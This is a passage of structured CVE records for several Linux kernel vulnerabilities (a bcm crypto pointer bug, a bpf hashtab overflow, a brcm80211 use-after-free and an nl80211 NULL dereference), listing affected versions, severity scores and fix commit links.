"timestamp": "2024-09-10T17:14:03.011266Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:34:55.557Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/crypto/bcm/spu2.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "c256b616067bfd6d274c679c06986b78d2402434",
"status": "affected",
"version": "9d12ba86f818aa9cfe9f01b750336aa441f2ffa2",
"versionType": "git"
},
{
"lessThan": "e719c8991c161977a67197775067ab456b518c7b",
"status": "affected",
"version": "9d12ba86f818aa9cfe9f01b750336aa441f2ffa2",
"versionType": "git"
},
{
"lessThan": "ebed0d666fa709bae9e8cafa8ec6e7ebd1d318c6",
"status": "affected",
"version": "9d12ba86f818aa9cfe9f01b750336aa441f2ffa2",
"versionType": "git"
},
{
"lessThan": "c69a1e4b419c2c466dd8c5602bdebadc353973dd",
"status": "affected",
"version": "9d12ba86f818aa9cfe9f01b750336aa441f2ffa2",
"versionType": "git"
},
{
"lessThan": "49833a8da6407e7e9b532cc4054fdbcaf78f5fdd",
"status": "affected",
"version": "9d12ba86f818aa9cfe9f01b750336aa441f2ffa2",
"versionType": "git"
},
{
"lessThan": "d0f14ae223c2421b334c1f1a9e48f1e809aee3a0",
"status": "affected",
"version": "9d12ba86f818aa9cfe9f01b750336aa441f2ffa2",
"versionType": "git"
},
{
"lessThan": "c0082ee420639a97e40cae66778b02b341b005e5",
"status": "affected",
"version": "9d12ba86f818aa9cfe9f01b750336aa441f2ffa2",
"versionType": "git"
},
{
"lessThan": "3b7a40740f04e2f27114dfd6225c5e721dda9d57",
"status": "affected",
"version": "9d12ba86f818aa9cfe9f01b750336aa441f2ffa2",
"versionType": "git"
},
{
"lessThan": "2b3460cbf454c6b03d7429e9ffc4fe09322eb1a9",
"status": "affected",
"version": "9d12ba86f818aa9cfe9f01b750336aa441f2ffa2",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/crypto/bcm/spu2.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.11"
},
{
"lessThan": "4.11",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.316",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.278",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.219",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.161",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.93",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.33",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.12",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.9.*",
"status": "unaffected",
"version": "6.9.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.10",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.316",
"versionStartIncluding": "4.11",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.278",
"versionStartIncluding": "4.11",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.219",
"versionStartIncluding": "4.11",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.161",
"versionStartIncluding": "4.11",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.93",
"versionStartIncluding": "4.11",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.33",
"versionStartIncluding": "4.11",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.12",
"versionStartIncluding": "4.11",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9.3",
"versionStartIncluding": "4.11",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10",
"versionStartIncluding": "4.11",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\ncrypto: bcm - Fix pointer arithmetic\n\nIn spu2_dump_omd() value of ptr is increased by ciph_key_len\ninstead of hash_iv_len which could lead to going beyond the\nbuffer boundaries.\nFix this bug by changing ciph_key_len to hash_iv_len.\n\nFound by Linux Verification Center (linuxtesting.org) with SVACE."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:14:32.487Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/c256b616067bfd6d274c679c06986b78d2402434"
},
{
"url": "https://git.kernel.org/stable/c/e719c8991c161977a67197775067ab456b518c7b"
},
{
"url": "https://git.kernel.org/stable/c/ebed0d666fa709bae9e8cafa8ec6e7ebd1d318c6"
},
{
"url": "https://git.kernel.org/stable/c/c69a1e4b419c2c466dd8c5602bdebadc353973dd"
},
{
"url": "https://git.kernel.org/stable/c/49833a8da6407e7e9b532cc4054fdbcaf78f5fdd"
},
{
"url": "https://git.kernel.org/stable/c/d0f14ae223c2421b334c1f1a9e48f1e809aee3a0"
},
{
"url": "https://git.kernel.org/stable/c/c0082ee420639a97e40cae66778b02b341b005e5"
},
{
"url": "https://git.kernel.org/stable/c/3b7a40740f04e2f27114dfd6225c5e721dda9d57"
},
{
"url": "https://git.kernel.org/stable/c/2b3460cbf454c6b03d7429e9ffc4fe09322eb1a9"
}
],
"title": "crypto: bcm - Fix pointer arithmetic",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-38579",
"datePublished": "2024-06-19T13:37:37.154Z",
"dateReserved": "2024-06-18T19:36:34.926Z",
"dateUpdated": "2025-11-04T17:21:33.961Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2024-26884 (GCVE-0-2024-26884)
Vulnerability from cvelistv5
Published
2024-04-17 10:27
Modified
2025-05-04 08:58
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
bpf: Fix hashtab overflow check on 32-bit arches
The hashtab code relies on roundup_pow_of_two() to compute the number of
hash buckets, and contains an overflow check by checking if the
resulting value is 0. However, on 32-bit arches, the roundup code itself
can overflow by doing a 32-bit left-shift of an unsigned long value,
which is undefined behaviour, so it is not guaranteed to truncate
neatly. This was triggered by syzbot on the DEVMAP_HASH type, which
contains the same check, copied from the hashtab code. So apply the same
fix to hashtab, by moving the overflow check to before the roundup.
References
| URL | Tags | ||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: daaf427c6ab392bedcd018e326b2ffa1e1110cd6 Version: daaf427c6ab392bedcd018e326b2ffa1e1110cd6 Version: daaf427c6ab392bedcd018e326b2ffa1e1110cd6 Version: daaf427c6ab392bedcd018e326b2ffa1e1110cd6 Version: daaf427c6ab392bedcd018e326b2ffa1e1110cd6 Version: daaf427c6ab392bedcd018e326b2ffa1e1110cd6 Version: daaf427c6ab392bedcd018e326b2ffa1e1110cd6 Version: daaf427c6ab392bedcd018e326b2ffa1e1110cd6 Version: daaf427c6ab392bedcd018e326b2ffa1e1110cd6 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2024-26884",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-10-30T19:28:25.440727Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-190",
"description": "CWE-190 Integer Overflow or Wraparound",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-10-30T19:29:01.146Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:21:05.540Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/33ec04cadb77605b71d9298311919303d390c4d5"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/92c81fbb3ed2e0dfc33a4183a67135e1ab566ace"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/64f00b4df0597590b199b62a37a165473bf658a6"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/3b08cfc65f07b1132c1979d73f014ae6e04de55d"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/a83fdaeaea3677b83a53f72ace2d73a19bcd6d93"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/8435f0961bf3dc65e204094349bd9aeaac1f8868"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/d817f0d34d927f2deb17dadbfe212c9a6a32ac3e"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/a6fa75b5096c0f9826a4fabe22d907b0a5bb1016"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/6787d916c2cf9850c97a0a3f73e08c43e7d973b1"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"kernel/bpf/hashtab.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "33ec04cadb77605b71d9298311919303d390c4d5",
"status": "affected",
"version": "daaf427c6ab392bedcd018e326b2ffa1e1110cd6",
"versionType": "git"
},
{
"lessThan": "92c81fbb3ed2e0dfc33a4183a67135e1ab566ace",
"status": "affected",
"version": "daaf427c6ab392bedcd018e326b2ffa1e1110cd6",
"versionType": "git"
},
{
"lessThan": "64f00b4df0597590b199b62a37a165473bf658a6",
"status": "affected",
"version": "daaf427c6ab392bedcd018e326b2ffa1e1110cd6",
"versionType": "git"
},
{
"lessThan": "3b08cfc65f07b1132c1979d73f014ae6e04de55d",
"status": "affected",
"version": "daaf427c6ab392bedcd018e326b2ffa1e1110cd6",
"versionType": "git"
},
{
"lessThan": "a83fdaeaea3677b83a53f72ace2d73a19bcd6d93",
"status": "affected",
"version": "daaf427c6ab392bedcd018e326b2ffa1e1110cd6",
"versionType": "git"
},
{
"lessThan": "8435f0961bf3dc65e204094349bd9aeaac1f8868",
"status": "affected",
"version": "daaf427c6ab392bedcd018e326b2ffa1e1110cd6",
"versionType": "git"
},
{
"lessThan": "d817f0d34d927f2deb17dadbfe212c9a6a32ac3e",
"status": "affected",
"version": "daaf427c6ab392bedcd018e326b2ffa1e1110cd6",
"versionType": "git"
},
{
"lessThan": "a6fa75b5096c0f9826a4fabe22d907b0a5bb1016",
"status": "affected",
"version": "daaf427c6ab392bedcd018e326b2ffa1e1110cd6",
"versionType": "git"
},
{
"lessThan": "6787d916c2cf9850c97a0a3f73e08c43e7d973b1",
"status": "affected",
"version": "daaf427c6ab392bedcd018e326b2ffa1e1110cd6",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"kernel/bpf/hashtab.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "3.19"
},
{
"lessThan": "3.19",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.311",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.273",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.214",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.153",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.83",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.23",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.11",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.2",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.311",
"versionStartIncluding": "3.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.273",
"versionStartIncluding": "3.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.214",
"versionStartIncluding": "3.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.153",
"versionStartIncluding": "3.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.83",
"versionStartIncluding": "3.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.23",
"versionStartIncluding": "3.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.11",
"versionStartIncluding": "3.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.2",
"versionStartIncluding": "3.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"versionStartIncluding": "3.19",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nbpf: Fix hashtab overflow check on 32-bit arches\n\nThe hashtab code relies on roundup_pow_of_two() to compute the number of\nhash buckets, and contains an overflow check by checking if the\nresulting value is 0. However, on 32-bit arches, the roundup code itself\ncan overflow by doing a 32-bit left-shift of an unsigned long value,\nwhich is undefined behaviour, so it is not guaranteed to truncate\nneatly. This was triggered by syzbot on the DEVMAP_HASH type, which\ncontains the same check, copied from the hashtab code. So apply the same\nfix to hashtab, by moving the overflow check to before the roundup."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T08:58:49.845Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/33ec04cadb77605b71d9298311919303d390c4d5"
},
{
"url": "https://git.kernel.org/stable/c/92c81fbb3ed2e0dfc33a4183a67135e1ab566ace"
},
{
"url": "https://git.kernel.org/stable/c/64f00b4df0597590b199b62a37a165473bf658a6"
},
{
"url": "https://git.kernel.org/stable/c/3b08cfc65f07b1132c1979d73f014ae6e04de55d"
},
{
"url": "https://git.kernel.org/stable/c/a83fdaeaea3677b83a53f72ace2d73a19bcd6d93"
},
{
"url": "https://git.kernel.org/stable/c/8435f0961bf3dc65e204094349bd9aeaac1f8868"
},
{
"url": "https://git.kernel.org/stable/c/d817f0d34d927f2deb17dadbfe212c9a6a32ac3e"
},
{
"url": "https://git.kernel.org/stable/c/a6fa75b5096c0f9826a4fabe22d907b0a5bb1016"
},
{
"url": "https://git.kernel.org/stable/c/6787d916c2cf9850c97a0a3f73e08c43e7d973b1"
}
],
"title": "bpf: Fix hashtab overflow check on 32-bit arches",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-26884",
"datePublished": "2024-04-17T10:27:39.672Z",
"dateReserved": "2024-02-19T14:20:24.185Z",
"dateUpdated": "2025-05-04T08:58:49.845Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2023-47233 (GCVE-0-2023-47233)
Vulnerability from cvelistv5
Published
2023-11-03 00:00
Modified
2025-03-06 15:58
Severity ?
VLAI Severity ?
EPSS score ?
CWE
- n/a
Summary
The brcm80211 component in the Linux kernel through 6.5.10 has a brcmf_cfg80211_detach use-after-free in the device unplugging (disconnect the USB by hotplug) code. For physically proximate attackers with local access, this "could be exploited in a real world scenario." This is related to brcmf_cfg80211_escan_timeout_worker in drivers/net/wireless/broadcom/brcm80211/brcmfmac/cfg80211.c.
References
| URL | Tags | |||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T21:09:35.699Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://bugzilla.suse.com/show_bug.cgi?id=1216702"
},
{
"tags": [
"x_transferred"
],
"url": "https://marc.info/?l=linux-kernel\u0026m=169907678011243\u0026w=2"
},
{
"tags": [
"x_transferred"
],
"url": "https://lore.kernel.org/all/20231104054709.716585-1-zyytlz.wz%40163.com/"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=0f7352557a35ab7888bc7831411ec8a3cbe20d78"
},
{
"name": "[debian-lts-announce] 20240625 [SECURITY] [DLA 3842-1] linux-5.10 security update",
"tags": [
"mailing-list",
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"name": "[debian-lts-announce] 20240627 [SECURITY] [DLA 3840-1] linux security update",
"tags": [
"mailing-list",
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "PHYSICAL",
"availabilityImpact": "HIGH",
"baseScore": 4.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:P/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2023-47233",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-03-06T15:54:23.860050Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-416",
"description": "CWE-416 Use After Free",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-03-06T15:58:48.113Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "The brcm80211 component in the Linux kernel through 6.5.10 has a brcmf_cfg80211_detach use-after-free in the device unplugging (disconnect the USB by hotplug) code. For physically proximate attackers with local access, this \"could be exploited in a real world scenario.\" This is related to brcmf_cfg80211_escan_timeout_worker in drivers/net/wireless/broadcom/brcm80211/brcmfmac/cfg80211.c."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-06-27T12:11:46.076Z",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"url": "https://bugzilla.suse.com/show_bug.cgi?id=1216702"
},
{
"url": "https://marc.info/?l=linux-kernel\u0026m=169907678011243\u0026w=2"
},
{
"url": "https://lore.kernel.org/all/20231104054709.716585-1-zyytlz.wz%40163.com/"
},
{
"url": "https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=0f7352557a35ab7888bc7831411ec8a3cbe20d78"
},
{
"name": "[debian-lts-announce] 20240625 [SECURITY] [DLA 3842-1] linux-5.10 security update",
"tags": [
"mailing-list"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"name": "[debian-lts-announce] 20240627 [SECURITY] [DLA 3840-1] linux security update",
"tags": [
"mailing-list"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
]
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2023-47233",
"datePublished": "2023-11-03T00:00:00.000Z",
"dateReserved": "2023-11-03T00:00:00.000Z",
"dateUpdated": "2025-03-06T15:58:48.113Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-36941 (GCVE-0-2024-36941)
Vulnerability from cvelistv5
Published
2024-05-30 15:29
Modified
2025-05-20 14:17
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
wifi: nl80211: don't free NULL coalescing rule
If the parsing fails, we can dereference a NULL pointer here.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: be29b99a9b51b0338eea3c66a58de53bbd01de24 Version: be29b99a9b51b0338eea3c66a58de53bbd01de24 Version: be29b99a9b51b0338eea3c66a58de53bbd01de24 Version: be29b99a9b51b0338eea3c66a58de53bbd01de24 Version: be29b99a9b51b0338eea3c66a58de53bbd01de24 Version: be29b99a9b51b0338eea3c66a58de53bbd01de24 Version: be29b99a9b51b0338eea3c66a58de53bbd01de24 Version: be29b99a9b51b0338eea3c66a58de53bbd01de24 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2024-36941",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-06-03T18:57:12.725668Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-476",
"description": "CWE-476 NULL Pointer Dereference",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-05-20T14:17:10.233Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T03:43:50.555Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/327382dc0f16b268950b96e0052595efd80f7b0a"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/97792d0611ae2e6fe3ccefb0a94a1d802317c457"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/5a730a161ac2290d46d49be76b2b1aee8d2eb307"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/ad12c74e953b68ad85c78adc6408ed8435c64af4"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/b0db4caa10f2e4e811cf88744fbf0d074b67ec1f"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/244822c09b4f9aedfb5977f03c0deeb39da8ec7d"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/f92772a642485394db5c9a17bd0ee73fc6902383"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/801ea33ae82d6a9d954074fbcf8ea9d18f1543a7"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00019.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/wireless/nl80211.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "327382dc0f16b268950b96e0052595efd80f7b0a",
"status": "affected",
"version": "be29b99a9b51b0338eea3c66a58de53bbd01de24",
"versionType": "git"
},
{
"lessThan": "97792d0611ae2e6fe3ccefb0a94a1d802317c457",
"status": "affected",
"version": "be29b99a9b51b0338eea3c66a58de53bbd01de24",
"versionType": "git"
},
{
"lessThan": "5a730a161ac2290d46d49be76b2b1aee8d2eb307",
"status": "affected",
"version": "be29b99a9b51b0338eea3c66a58de53bbd01de24",
"versionType": "git"
},
{
"lessThan": "ad12c74e953b68ad85c78adc6408ed8435c64af4",
"status": "affected",
"version": "be29b99a9b51b0338eea3c66a58de53bbd01de24",
"versionType": "git"
},
{
"lessThan": "b0db4caa10f2e4e811cf88744fbf0d074b67ec1f",
"status": "affected",
"version": "be29b99a9b51b0338eea3c66a58de53bbd01de24",
"versionType": "git"
},
{
"lessThan": "244822c09b4f9aedfb5977f03c0deeb39da8ec7d",
"status": "affected",
"version": "be29b99a9b51b0338eea3c66a58de53bbd01de24",
"versionType": "git"
},
{
"lessThan": "f92772a642485394db5c9a17bd0ee73fc6902383",
"status": "affected",
"version": "be29b99a9b51b0338eea3c66a58de53bbd01de24",
"versionType": "git"
},
{
"lessThan": "801ea33ae82d6a9d954074fbcf8ea9d18f1543a7",
"status": "affected",
"version": "be29b99a9b51b0338eea3c66a58de53bbd01de24",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"net/wireless/nl80211.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "3.12"
},
{
"lessThan": "3.12",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.314",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.276",
"versionType": "semver"
},
{
